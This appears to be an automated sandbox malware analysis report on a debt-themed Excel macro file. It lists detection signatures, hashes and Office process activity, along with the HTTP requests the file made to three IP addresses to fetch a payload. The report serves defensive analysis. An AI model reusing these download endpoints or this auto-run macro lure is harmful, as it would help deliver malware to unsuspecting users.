Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-170373600-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-170373600-05042021.xlsm
Analysis ID:404124
MD5:965c271faf86d03c634d62c30c54bbfe
SHA1:541c52b418192627a3948a50ac3aeaf9441570f1
SHA256:ca4072e5c04688b42b9fb306dc7d051260aef6266575b5be8a93e39d075b9abf
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6360 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 84MB
Source: global trafficTCP traffic: 192.168.2.6:49720 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.6:49720 -> 91.211.91.81:80
Source: Joe Sandbox ViewIP Address: 91.211.91.81 91.211.91.81
Source: Joe Sandbox ViewIP Address: 5.34.179.36 5.34.179.36
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.aadrm.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.cortana.ai
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.office.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.onedrive.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://augloop.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://augloop.office.com/v2
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cdn.entity.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://clients.config.office.net/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://config.edge.skype.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cortana.ai
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cortana.ai/api
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://cr.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dev.cortana.ai
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://devnull.onenote.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://directory.services.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://graph.windows.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://graph.windows.net/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://lifecycle.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://login.windows.local
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://management.azure.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://management.azure.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://messaging.office.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ncus.contentsync.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://officeapps.live.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://onedrive.live.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://outlook.office.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://outlook.office365.com/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://powerlift.acompli.net
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://settings.outlook.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://staging.cortana.ai
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://tasks.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://webshell.suite.office.com
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://wus2.contentsync.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: BC845148-00A9-4205-955C-A92C29B04445.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-170373600-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open
Source: Outstanding-Debt-170373600-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{6AA73D4F-5BDF-486F-BB93-621B45A8C22C} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-170373600-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
